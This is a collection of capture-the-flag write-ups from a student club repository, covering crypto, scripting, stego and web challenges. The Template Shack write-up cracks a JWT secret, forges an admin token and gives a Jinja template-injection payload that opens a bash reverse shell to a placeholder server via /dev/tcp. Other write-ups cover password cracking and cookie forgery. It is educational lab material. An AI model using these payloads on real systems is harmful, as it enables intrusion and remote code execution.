-d`. 80 | 81 | ```bash 82 | $ python fossil | base64 -d 83 | flag{tyrannosauras_xor_in_reverse} 84 | ``` 85 | 86 | The flag is: 87 | ``` 88 | flag{tyrannosauras_xor_in_reverse} 89 | ``` -------------------------------------------------------------------------------- /HacktivityCon CTF/Mobile/Mobile One/README.md: -------------------------------------------------------------------------------- 1 | # Mobile One 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | # Requirements 6 | 7 | - strings 8 | 9 | # Source 10 | 11 | ``` 12 | The one true mobile app. 
13 | ``` 14 | 15 | - [mobile_one.apk](./mobile_one.apk) 16 | 17 | # Exploitation 18 | 19 | Download the apk. Run strings on it. That's it. 20 | 21 | ```bash 22 | $ strings mobile_one.apk | grep flag 23 | ##flag{strings_grep_and_more_strings} 24 | flag 25 | ``` 26 | 27 | The flag is: 28 | ``` 29 | flag{strings_grep_and_more_strings} 30 | ``` -------------------------------------------------------------------------------- /HacktivityCon CTF/Mobile/Mobile One/mobile_one.apk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/HacktivityCon CTF/Mobile/Mobile One/mobile_one.apk -------------------------------------------------------------------------------- /HacktivityCon CTF/Pwn/README.md: -------------------------------------------------------------------------------- 1 | # Pwn 2 | 3 | Check out the writeups at: 4 | https://hackmd.io/@HKraw/ryLQnzbZP -------------------------------------------------------------------------------- /HacktivityCon CTF/README.md: -------------------------------------------------------------------------------- 1 | # HacktivityCon CTF 2 | 3 | - Official URL: https://ctf.hacktivitycon.com/ 4 | - Format: Jeopardy 5 | - Duration: Thu, 30 July 2020, 00:30 IST — Sat, 01 Aug. 
2020, 00:30 IST -------------------------------------------------------------------------------- /HacktivityCon CTF/Scripting/Hashbrown Caserole/README.md: -------------------------------------------------------------------------------- 1 | # Hashbrown Caserole 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | # Requirements 6 | 7 | - Python 8 | 9 | # Source 10 | 11 | ``` 12 | Hashbrowns 13 | 14 | Connect here: 15 | nc jh2i.com 50005 16 | ``` 17 | 18 | # Exploitation 19 | 20 | ```python 21 | import hashlib 22 | from pwn import remote 23 | 24 | r = remote('jh2i.com', 50005) 25 | 26 | def match_sha1(n): 27 | for i in range(0, 10**8): 28 | if i%1000000 == 0: print(i) 29 | if(hashlib.sha1(str(i).encode()).hexdigest()[:len(n)] == n): 30 | return i 31 | 32 | def match_md5(n): 33 | for i in range(0, 10**8): 34 | if i%1000000 == 0: print(i) 35 | if(hashlib.md5(str(i).encode()).hexdigest()[:len(n)] == n): 36 | return i 37 | 38 | while True: 39 | t = 'md5' 40 | x = r.recv(1024).decode().strip() 41 | print(x) 42 | 43 | if 'sha1' in x: 44 | t = 'sha1' 45 | 46 | if ('flag' in x): break 47 | 48 | x = x.split(': ')[1] 49 | 50 | res = 0 51 | if t == 'md5': 52 | res = match_md5(x) 53 | else: 54 | res = match_sha1(x) 55 | 56 | r.sendline(str(res)) 57 | print('Sending: ' + str(res)) 58 | print(r.recvline().decode()) 59 | ``` 60 | 61 | This is probably not the most efficient script, you could create a reverse dictionary and map it directly, but this works too. The script runs for several minutes and gives you the flag. 62 | 63 | ```bash 64 | $ python script.py 65 | ... 66 | ... 67 | That casserole was DELICIOUS!!!! 
Here's your flag: flag{warm_casseroles_for_breakfast!!!} 68 | ``` 69 | 70 | 71 | The flag is: 72 | 73 | ``` 74 | flag{warm_casseroles_for_breakfast!!!} 75 | ``` -------------------------------------------------------------------------------- /HacktivityCon CTF/Scripting/Impartial/README.md: -------------------------------------------------------------------------------- 1 | # Impartial 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | # Requirements 6 | 7 | - Python 8 | 9 | # Source 10 | 11 | ``` 12 | Check out the terminal-interface for this new company! Can you uncover any secrets? 13 | 14 | Connect with: 15 | nc jh2i.com 50026 16 | ``` 17 | 18 | # Exploitation 19 | 20 | Every time you try to log in as admin, it asks you for 3 letters of the password. 21 | 22 | ``` 23 | Impartial Advice and Consulting 24 | . . . we will help you put the pieces together! 25 | 26 | 1. About 27 | 2. Login 28 | 3. Register 29 | 4. Contact 30 | ?. Exit 31 | 32 | > 2 33 | 34 | Please enter a username to log in. 35 | 36 | Username: admin 37 | 38 | For your security, please only enter a partial password. 39 | To protect your account from hackers, enter only the characters 40 | at position 13, 32, and 10 (separated by spaces). 41 | 42 | Password: 43 | ``` 44 | 45 | For each position of the password, keep a list of candidate characters. When a guess for a position is rejected, remove that candidate; when it is accepted, keep only that candidate and drop all the others. 
Here's a script: 46 | 47 | ```python 48 | from pwn import remote 49 | import re 50 | import string 51 | 52 | r = remote("jh2i.com", 50026) 53 | 54 | flag = [''] + list('flag{') + ['?']*50 55 | 56 | letters = list(string.ascii_lowercase + '_}1234567890') 57 | tries = {i: letters for i in range(1, 51)} 58 | 59 | 60 | # flag = [''] + list('flag{partial?pass?ord?puz?le?pieces????????????????????') 61 | # flag{partial_password_puzzle_pieces} 62 | for i in range(1, len(flag)): 63 | if flag[i] == '?': continue 64 | tries[i] = [flag[i]] 65 | 66 | rec = r.recvuntil(">").decode() 67 | print(rec, end=" ") 68 | 69 | while True: 70 | res = b"2" 71 | r.sendline(res) 72 | print(res) 73 | 74 | rec = r.recvuntil("Username:").decode() 75 | print(rec, end=" ") 76 | 77 | res = b"admin" 78 | r.sendline(res) 79 | print(res) 80 | 81 | rec = r.recvuntil("Password:").decode() 82 | print(rec, end=" ") 83 | 84 | indices = [int(i) for i in re.findall(r'\d+', rec)] 85 | 86 | res = [] 87 | 88 | for index in indices: 89 | res.append(tries[index][0]) 90 | 91 | res = ' '.join(res) 92 | print(res) 93 | r.sendline(res) 94 | 95 | rec = r.recvuntil('>').decode() 96 | print(rec) 97 | 98 | if '1. Judge' in rec: 99 | r.sendline(b'3') 100 | print(''.join(flag)) 101 | continue 102 | 103 | x = rec.split('1. About')[0].strip().split('\n') 104 | 105 | for i in range(len(x)): 106 | t = tries[indices[i]] 107 | if 'WRONG' in x[i]: 108 | tries[indices[i]] = t[1:] 109 | else: 110 | tries[indices[i]] = [t[0]] 111 | flag[indices[i]] = t[0] 112 | print(''.join(flag)) 113 | ``` 114 | 115 | When I ran the script for a while, I got this much of the flag: 116 | 117 | ``` 118 | $ python script.py 119 | ... 120 | flag{partial?pass?ord?puz?le?pieces???????????????????? 121 | ``` 122 | 123 | From here, you can possibly guess the flag. 124 |
125 | 126 | The flag is: 127 | 128 | ``` 129 | flag{partial_password_puzzle_pieces} 130 | ``` 131 | -------------------------------------------------------------------------------- /HacktivityCon CTF/Scripting/Prophecy/README.md: -------------------------------------------------------------------------------- 1 | # Prophecy 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | # Requirements 6 | 7 | - Python 8 | - Pwntools (Linux) 9 | 10 | # Source 11 | 12 | ``` 13 | C A N Y O U S E E T H E F U T U R E ? 14 | 15 | Connect with: 16 | nc jh2i.com 50012 17 | ``` 18 | 19 | # Exploitation 20 | 21 | Every time you connect using netcat, it makes you guess a number, and if you guess incorrectly, it tells you what the number was. So each wrong guess reveals one more number of the sequence. Reconnect repeatedly, replaying the numbers you already know, and you eventually collect all of them. 22 | 23 | 24 | ```python 25 | from pwn import remote 26 | 27 | numbers = [0] * 100 28 | 29 | i = 0 30 | 31 | while True: 32 | if i == 0: 33 | r = remote("jh2i.com", 50012) 34 | 35 | try: 36 | re = r.recvuntil(">") 37 | except Exception as e: 38 | r.interactive() 39 | continue 40 | 41 | print(re.decode(), end=" ") 42 | 43 | r.sendline(str(numbers[i]).encode()) 44 | print(str(numbers[i])) 45 | 46 | print([i for i in numbers if i != 0]) 47 | 48 | if numbers[i] == 0: 49 | res = r.recvuntil(".").decode() 50 | res += r.recv(1024).decode() 51 | numbers[i] = res.split("W A S ")[1].strip() 52 | i = 0 53 | else: 54 | i += 1 55 | ``` 56 | 57 | The script runs for a few minutes and in the end gives you the flag. 58 | 59 | ```bash 60 | $ python script.py 61 | ... 62 | 63 | W H A T I S T H E N E X T N U M B E R T O C O M E F R O M T H E F U T U R E ? 
64 | 65 | > 83643 66 | ['99126', '76106', '32378', '49560', '87935', '17366', '36639', '33561', '51241', '24009', '82718', '65774', '87030', '53097', '53885', '29931', '10890', '20583', '46190', '83643'] 67 | [*] Switching to interactive mode 68 | ============================================================================== 69 | 70 | Y O U T O O C A N S E E T H E F U T U R E 71 | ============================================================================== 72 | flag{does_this_count_as_artificial_intelligence} 73 | ``` 74 | 75 | The flag is 76 | 77 | ``` 78 | flag{does_this_count_as_artificial_intelligence} 79 | ``` 80 | -------------------------------------------------------------------------------- /HacktivityCon CTF/Scripting/Tootsie Pop/README.md: -------------------------------------------------------------------------------- 1 | # Tootsie Pop 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | # Requirements 6 | 7 | - Python 8 | 9 | # Source 10 | 11 | ``` 12 | How many licks does it take to get to the center of a tootsie pop? 13 | 14 | Download the file below. 15 | ``` 16 | 17 | - [pop.zip](./pop.zip) 18 | 19 | # Exploitation 20 | 21 | The flag has been compressed recursively with various types of compressing tools, namely 'xz', 'zip', 'bzip', 'gzip'. You can write a script to use the `file` command to find out the compression type of the current file and decompress it depending upon the type of compression. 
22 | 23 | ```python 24 | import subprocess 25 | import os 26 | 27 | filetypes = ['xz', 'zip', 'bzip', 'gzip'] 28 | 29 | while True: 30 | x = subprocess.check_output('ls', shell=True).decode().split('\n')[0] 31 | print(x) 32 | 33 | y = subprocess.check_output(f'file {x}', shell=True).decode() 34 | print(y) 35 | 36 | if 'gzip' in y: 37 | if not x.endswith('.gz'): 38 | os.system(f'mv {x} {x}.gz') 39 | x = f'{x}.gz' 40 | os.system(f'gunzip {x}') 41 | print('Uncompressed gzip') 42 | 43 | if 'XZ' in y: 44 | if not x.endswith('.xz'): 45 | os.system(f'mv {x} {x}.xz') 46 | x = f'{x}.xz' 47 | os.system(f'unxz {x}') 48 | print('Uncompressed xz') 49 | 50 | if 'bzip2' in y: 51 | if not x.endswith('.bz2'): 52 | os.system(f'mv {x} {x}.bz2') 53 | x = f'{x}.bz2' 54 | os.system(f'bzip2 -d {x}') 55 | print('Uncompressed bz2') 56 | 57 | if 'Zip' in y: 58 | if not x.endswith('.zip'): 59 | os.system(f'mv {x} {x}.zip') 60 | x = f'{x}.zip' 61 | os.system(f'unzip {x}') 62 | print('Uncompressed zip') 63 | os.system(f'mv {x} trash/{x}') 64 | 65 | if 'ASCII' in y: 66 | os.system(f'cat {x}') 67 | break 68 | ``` 69 | 70 | Remember to have a `trash` folder in the same directory as your script, and run it from a throwaway directory that contains only the archive: the script takes the first entry of `ls` as the current file and splices that name straight into `shell=True` / `os.system` command strings, so an archive member whose name contains spaces or shell metacharacters (`;`, `$(...)`) would be mis-parsed or executed, and `unzip` will extract whatever the archive contains. For untrusted archives, use `subprocess.run([...])` argument lists and the `gzip`/`lzma`/`bz2`/`zipfile` modules instead. Once it decompresses all, it gives you the flag in a file called `8c4be4`. 71 | 72 | ```bash 73 | $ python script.py 74 | ... 75 | ... 
76 | flag{the_answer_is_1548_licks} 77 | ``` 78 | 79 | 80 | The flag is: 81 | 82 | ``` 83 | flag{the_answer_is_1548_licks} 84 | ``` -------------------------------------------------------------------------------- /HacktivityCon CTF/Scripting/Tootsie Pop/pop.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/HacktivityCon CTF/Scripting/Tootsie Pop/pop.zip -------------------------------------------------------------------------------- /HacktivityCon CTF/Steganography/Chess Cheater/README.md: -------------------------------------------------------------------------------- 1 | # Chess Cheater 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | # Requirements 6 | 7 | - Morse Decoder 8 | 9 | # Source 10 | 11 | ``` 12 | I didn't think he was a genius, I knew he had to be a cheat. He was always sitting down, he never got up. Batting his eyelids in the most unnatural way. Then I understood it. 13 | 14 | Note, this flag is not in the usual format. 15 | 16 | Download the file below. 17 | ``` 18 | 19 | - [morse.wav](./morse.wav) 20 | 21 | # Exploitation 22 | 23 | Decode the morse code audio (I used an online decoder at [morsecode.world](https://morsecode.world/international/decoder/audio-decoder-adaptive.html)). You get something along the lines of `ARCANGELORICCIARDI`. Maybe it's a bit distorted sometimes, but when you search it up on google, you see that Arcangelo Ricciardi was accused of cheating in a game of chess by using morse code. 24 |
25 | 26 | The flag is: 27 | 28 | ``` 29 | ARCANGELORICCIARDI 30 | ``` -------------------------------------------------------------------------------- /HacktivityCon CTF/Steganography/Chess Cheater/morse.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/HacktivityCon CTF/Steganography/Chess Cheater/morse.wav -------------------------------------------------------------------------------- /HacktivityCon CTF/Steganography/Cold War/README.md: -------------------------------------------------------------------------------- 1 | # Cold War 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | # Requirements 6 | 7 | - Stegsnow 8 | 9 | # Source 10 | 11 | ``` 12 | A geopolitical activity that is pursued through economic and political actions, propaganda, acts of espionage or proxy wars and without direct military action is known as a Cold War. This type of war does not refer to conflict of seasons, but this challenge might. 13 | 14 | Download the file below. 15 | ``` 16 | 17 | - [cold_war.txt](./cold_war.txt) 18 | 19 | # Exploitation 20 | 21 | The repeated usage of `cold` war hints that you might have to use stegsnow. And it is in fact what you need to use. 22 | 23 | ``` 24 | $ stegsnow -C cold_war.txt 25 | flag{do_not_use_merriam_webster}# 26 | ``` 27 | 28 | The flag is: 29 | 30 | ``` 31 | flag{do_not_use_merriam_webster} 32 | ``` -------------------------------------------------------------------------------- /HacktivityCon CTF/Steganography/Cold War/cold_war.txt: -------------------------------------------------------------------------------- 1 | The Cold War continues to influence world affairs. 
The post-Cold War world is considered to be unipolar, with the United States the sole remaining superpower.The Cold War defined the political role of the United States after World War II—by 1989 the United States had military alliances with 50 countries, with 526,000 troops stationed abroad, with 326,000 in Europe (two-thirds of which were in West Germany) and 130,000 in Asia (mainly Japan and South Korea). The Cold War also marked the zenith of peacetime military–industrial complexes, especially in the United States, and large-scale military funding of science. These complexes, though their origins may be found as early as the 19th century, snowballed considerably during the Cold War. 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /HacktivityCon CTF/Steganography/Spy vs. Spy/README.md: -------------------------------------------------------------------------------- 1 | # Spy vs. Spy 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | # Requirements 6 | 7 | - Gimp / Stegsolve 8 | 9 | # Source 10 | 11 | ``` 12 | Antonio Prohías was a cartoonist known primarily as the creator of the satirical comic strip Spy vs. Spy for Mad magazine. It wasn't until after 1997 when the comics changed from black and white to full color. 13 | 14 | Download the file below. 15 | ``` 16 | 17 | - [spy_vs_spy.png](./spy_vs_spy.png) 18 | 19 | # Exploitation 20 | 21 | The intended solution is probably to use `stegsolve`. We just opened the image in gimp, reduced brightness and increased contrast. Finally, you can see `spies}` on top of the image. We guessed the rest of the flag, using Wikipedia for information XD. 22 |
23 | 24 | The flag is: 25 | 26 | ``` 27 | flag{two_MAD_spies} 28 | ``` -------------------------------------------------------------------------------- /HacktivityCon CTF/Steganography/Spy vs. Spy/spy_vs_spy.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/HacktivityCon CTF/Steganography/Spy vs. Spy/spy_vs_spy.png -------------------------------------------------------------------------------- /HacktivityCon CTF/Web/Template Shack/README.md: -------------------------------------------------------------------------------- 1 | # Template Shack 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | # Requirements 6 | 7 | - JWT 8 | - John The Ripper 9 | 10 | # Source 11 | 12 | ``` 13 | Check out the coolest web templates online! 14 | 15 | Connect here: 16 | http://jh2i.com:50023 17 | ``` 18 | 19 | # Exploitation 20 | 21 | When you visit the website, you find that there's a cookie containing a JWT. It's signed with `HS256` (HMAC-SHA256), so anyone who knows the server-side secret can mint a token with any claims they like, and a secret that appears in a wordlist is as good as no signature. We used `rockyou.txt` to bruteforce the JWT secret, using John The Ripper. 22 | 23 | ``` 24 | $ john jwt.txt --wordlist=rockyou.txt --format=HMAC-SHA256 25 | ``` 26 | 27 | The secret is `supersecret`. Using this, you can make a JWT with `username: admin`. 28 | 29 | ``` 30 | eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImFkbWluIn0.Ykqid4LTnSPZtoFb11H-_2q-Vo32g4mLpkEcajK0H7I 31 | ``` 32 | 33 | Now, add this to your cookie. You are logged in as admin. Visit some random route starting with `/admin/` which throws a 404. The 404 page reflects the requested path, and the curly braces in it get evaluated, so there's scope for server-side template injection (SSTI) there. 34 | 35 | ``` 36 | http://jh2i.com:50023/template/admin/%7B%7B().__class__.__bases__[0].__subclasses__()%7D%7D 37 | ``` 38 | 39 | You can climb up the Python MRO using the `__class__` and `__bases__`, etc. This way you can find a list of all the classes you can use. On index 405, you see `subprocess.Popen`. That index is specific to this target: the order of `__subclasses__()` depends on the interpreter version and on which modules the application has imported, so against another instance dump the list and locate `Popen` by name instead of hard-coding 405. 
40 | 41 | ``` 42 | http://jh2i.com:50023/template/admin/%7B%7B().__class__.__bases__[0].__subclasses__()[405]%7D%7D 43 | ``` 44 | 45 | This shows `/template/admin/` on the website. 46 | 47 | Now, you can use this to spawn a reverse shell. 48 | 49 | ``` 50 | http://jh2i.com:50023/template/admin/%7B%7B().__class__.__bases__[0].__subclasses__()[405](['bash -c %22bash -i %3E& /dev/tcp/yourserverip/yourport 0%3E&1%22'], shell=True)%7D%7D 51 | ``` 52 | 53 | > Note: Replace yourserverip and yourport. 54 | 55 | Start a `netcat` listener on your server at the specified port. 56 | 57 | You get a shell! 58 | 59 | ``` 60 | $ nc -lp 8000 61 | bash: cannot set terminal process group (8): Inappropriate ioctl for device 62 | bash: no job control in this shell 63 | user@272108e56147:~$ ls 64 | ls 65 | flag.txt 66 | main.py 67 | posts.py 68 | requirements.txt 69 | templates 70 | user@272108e56147:~$ cat flag.txt 71 | cat flag.txt 72 | flag{easy_jinja_SSTI_RCE} 73 | ``` 74 | 75 | The flag is: 76 | 77 | ``` 78 | flag{easy_jinja_SSTI_RCE} 79 | ``` -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2020 Computer Society of India - VIT University 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 
14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /NahamCon CTF/Crpytography/Homecooked/decrypt.py: -------------------------------------------------------------------------------- 1 | import base64 2 | num = 0 3 | count = 0 4 | cipher_b64 = b"MTAwLDExMSwxMDAsOTYsMTEyLDIxLDIwOSwxNjYsMjE2LDE0MCwzMzAsMzE4LDMyMSw3MDIyMSw3MDQxNCw3MDU0NCw3MTQxNCw3MTgxMCw3MjIxMSw3MjgyNyw3MzAwMCw3MzMxOSw3MzcyMiw3NDA4OCw3NDY0Myw3NTU0MiwxMDAyOTAzLDEwMDgwOTQsMTAyMjA4OSwxMDI4MTA0LDEwMzUzMzcsMTA0MzQ0OCwxMDU1NTg3LDEwNjI1NDEsMTA2NTcxNSwxMDc0NzQ5LDEwODI4NDQsMTA4NTY5NiwxMDkyOTY2LDEwOTQwMDA=" 5 | 6 | def a(num): 7 | if (num > 1): 8 | for i in range(2,num): 9 | if (num % i) == 0: 10 | return False 11 | break 12 | return True 13 | else: 14 | return False 15 | 16 | def b(num): 17 | my_str = str(num) 18 | rev_str = reversed(my_str) 19 | if list(my_str) == list(rev_str): 20 | return True 21 | else: 22 | return False 23 | 24 | 25 | cipher = base64.b64decode(cipher_b64).decode().split(",") 26 | 27 | while(count < len(cipher)): 28 | if (a(num)): 29 | if (b(num)): 30 | print(chr(int(cipher[count]) ^ num), end='', flush=True) 31 | count += 1 32 | if (count == 13): 33 | num = 50000 34 | if (count == 26): 35 | num = 500000 36 | else: 37 | pass 38 | num+=1 39 | 40 | print() -------------------------------------------------------------------------------- /NahamCon CTF/README.md: -------------------------------------------------------------------------------- 1 | # NahamCon CTF 2 | 3 | 
- Official URL: https://ctf.nahamcon.com/challenges 4 | - Format: Jeopardy 5 | - Duration: Fri, 12 June 2020, 20:30 IST — Sun, 14 June 2020, 03:30 IST 6 | -------------------------------------------------------------------------------- /NahamCon CTF/Scripting/Rotten/script.py: -------------------------------------------------------------------------------- 1 | flag = [None]*100 2 | def response(s): 3 | offset = ord(s[0]) - ord('s') 4 | 5 | position = 0 6 | 7 | res = '' 8 | for i in s: 9 | if not i.isalpha(): 10 | if i.isnumeric(): 11 | position = position*10 + int(i) 12 | 13 | res += i 14 | continue 15 | res += chr((ord(i) - ord('a') - offset) % 26 + ord('a')) 16 | 17 | if len(res) == 55: 18 | return res 19 | 20 | flag[position] = res[-2] 21 | 22 | return res 23 | 24 | from pwn import remote 25 | 26 | r = remote('jh2i.com', 50034) 27 | 28 | while True: 29 | received = r.recv() 30 | x = received.decode().strip() 31 | 32 | print(x) 33 | y = response(x) 34 | r.send(y) 35 | print(y) 36 | print() 37 | f = ''.join([i for i in flag if i != None]) 38 | print(f) 39 | print() 40 | 41 | # Rotten 42 | -------------------------------------------------------------------------------- /NahamCon CTF/Warmup/Easy Keesy/README.md: -------------------------------------------------------------------------------- 1 | # Easy Keesy 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | The file downloaded is a password protected Keepass file. You bruteforce the password using `John the Ripper` and you open the file to see the flag. 6 | 7 | # Requirements 8 | 9 | - John the Ripper 10 | - keepass2john 11 | 12 | # Source 13 | 14 | ``` 15 | Dang it, not again... 16 | 17 | Download the file below. 18 | 19 | [easy_keesy](https://ctf.nahamcon.com/files/4ae2a2f6c8aaca62ed67141489e995d0/easy_keesy?token=eyJ1c2VyX2lkIjoyMzk2LCJ0ZWFtX2lkIjpudWxsLCJmaWxlX2lkIjozMH0.XuYl2A.3KcnraGOdGA0MCn9yVrweyEto-E) 20 | ``` 21 | 22 | The file is included in the repo as well: [easy_keesy](./easy_keesy). 
23 | 24 | # Exploitation 25 | 26 | First, we check what kind of a file it actually is. The Linux `file` command can be used for this. 27 | 28 | ```bash 29 | $ file easy_keesy 30 | easy_keesy: Keepass password database 2.x KDBX 31 | ``` 32 | 33 | So, this is a password protected `keepass` file. We're going to use `John the Ripper` to bruteforce the password. But, before that, we need to convert the file into a format `John` can read. 34 | 35 | ```bash 36 | keepass2john easy_keesy > ek 37 | ``` 38 | 39 | The output from the `keepass2john` tool is now saved in a file `ek`. Now, you just run `john ek` and wait till you get a password. With no `--wordlist` given, john falls back to its default cracking modes, so if that stalls point it at a wordlist explicitly (`john ek --wordlist=rockyou.txt`); `john --show ek` prints a password that was already cracked. The valid password obtained is `monkeys`. 40 |
41 | 42 | Now, just open the keepass file, enter the password, and read the flag. -------------------------------------------------------------------------------- /NahamCon CTF/Warmup/Easy Keesy/easy_keesy: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/NahamCon CTF/Warmup/Easy Keesy/easy_keesy -------------------------------------------------------------------------------- /NahamCon CTF/Warmup/UGGC/README.md: -------------------------------------------------------------------------------- 1 | # UGGC 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | In this challenge, the goal is to modify the cookies so that you become the admin. 6 | 7 | # Requirements 8 | 9 | - Browser Devtools 10 | 11 | # Source 12 | 13 | - http://jh2i.com:50018/login 14 | 15 | ``` 16 | Become the admin! 17 | 18 | Connect here: 19 | http://jh2i.com:50018 20 | ``` 21 | 22 | # Exploitation 23 | 24 | When you type in a random username, for example, `csictf`, and check the Cookies in the Application tab of Browser Dev-Tools (alternatively `console.log(document.cookie)`), you see a cookie named user set to `pfvpgs`. The target is to make the username corresponding to this cookie be `admin`. This is similar to another Caesar's cipher challenge. 25 | 26 | As you see, there is an offset of 13 between the characters in `csictf` and `pfvpgs`. Therefore, you can find out the string corresponding to `admin` by encrypting it with an offset of 13. 27 | 28 | ```python 29 | >>> print(''.join([chr((ord(i) + 13)) for i in 'admin'])) 30 | 'nqzv{' 31 | ``` 32 | 33 | Now, the last character is `{`, so we subtract 26 to get the required character. 34 | 35 | > Note: The offset is 13 and we know 'n' maps to 'a', so obviously 'a' will map to 'n', but we'll try it anyway. 
36 | 37 | ```python 38 | >>> print(chr(ord('{')-26)) 39 | 'a' 40 | ``` 41 | 42 | So the target cookie is `nqzva`. Modify the cookie on Browser Dev-tools and refresh the page to get the flag. The underlying bug: the `user` cookie is just ROT13 of the username, with no signature and no server-side session lookup, so any client can forge any identity; a session cookie needs to be an opaque random token or a signed value the server can verify. 43 | 44 | ``` 45 | flag{H4cK_aLL_7H3_C0okI3s} 46 | ``` -------------------------------------------------------------------------------- /NahamCon CTF/Web/Agent 95/README.md: -------------------------------------------------------------------------------- 1 | # Agent 95 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | As the name suggests, change the User Agent to Windows 95. 6 | 7 | # Requirements 8 | 9 | - Basic Knowledge of Request headers 10 | 11 | # Source 12 | 13 | - http://jh2i.com:50000. 14 | 15 | ``` 16 | They've given you a number, and taken away your name~ 17 | 18 | Connect here: 19 | http://jh2i.com:50000 20 | ``` 21 | 22 | # Exploitation 23 | 24 | The challenge is very simple once you know what to do. 25 | 26 | ``` 27 | We will only give our flag to our Agent 95! He is still running an old version of Windows... 28 | ``` 29 | 30 | We assume Agent 95 uses Windows 95. So just change the `User-Agent` header to `Mozilla/4.0 (compatible; MSIE 4.01; Windows 95)`. The `User-Agent` header is set entirely by the client, which is exactly why a server must never use it as an access check. 31 | 32 | ```python 33 | >>> import requests 34 | >>> r = requests.get('http://jh2i.com:50000', headers={'User-Agent': 'Mozilla/4.0 (compatible; MSIE 4.01; Windows 95)'}) 35 | >>> r.text 36 | 'flag{user_agents_undercover}\n
\n



\n NOT CHALLENGE RELATED:
THANK YOU to Digital Ocean for supporting NahamCon and NahamCon CTF!\n

\n\n

\n
' 37 | ``` 38 | 39 | There, you got the flag. 40 | 41 | ``` 42 | flag{user_agents_undercover} 43 | ``` -------------------------------------------------------------------------------- /UMDCTF 2021/Crypto/Art Class.md: -------------------------------------------------------------------------------- 1 | > # Art Class - Crypto 2 | Author - [Rakesh](http://github.com/Rakesh1772) 3 | --- 4 | Requirements : Ability to google efficiently. 5 | 6 | --- 7 | Problem description - 8 | 9 | > I was drawing in art class when I glanced over at my classmates drawings. I snapped a picture because I wanted to look up what it meant. Can you figure out what this drawing is? 10 | 11 | Below this, a link was provided to download an image. 12 | 13 | Here's the image: 14 | ![Art Class IMG](https://i.imgur.com/u2hXiU9.png) 15 | 16 | Initial thoughts after looking at this image was that these were a bunch of flags from different countries and we can just decode this by looking up each country, but most of these flags did not belong to any country. So I looked up for online flag identifiers and found this [website](http://www.flag-finder.com/). Here I found out the first flag and it was a signal flag representing a specific letter. 17 | 18 | So I looked up for signal flags on google and dicovered that the given flags were [International maritime signal flags](https://en.wikipedia.org/wiki/International_maritime_signal_flags). 19 | 20 | After this, it was just a matter of decoding each flag to the respective letter. 21 | ![Maritime Signal Flags](https://i.imgur.com/9yHUap7.jpg) 22 | 23 | 24 | The flag for this challenge is **UMDCTF-{F1AG_0F_7LA9S}**. 
25 | -------------------------------------------------------------------------------- /UMDCTF 2021/OSINT/vacation.md: -------------------------------------------------------------------------------- 1 | # Vacation - OSINT 2 | 3 | Author - [BlackJack](http://github.com/Mannan-Goyal) 4 | 5 | Requirements : Know how to google 6 | 7 | * * * 8 | 9 | When we start to solve the challenge we are faced with a pretty elaborate hint which says - 10 | 11 | > My mom told me she went to this amazing brewing company in the Carribbean and when I asked her the name of the place, she sent me a picture of her ship. Can you help me find the name of this brewing company? 12 | 13 | This already narrows our search in the Carribbean... 14 | 15 | After this we move on to inspect the picture provided as a google drive link 16 | 17 | ![Challenge 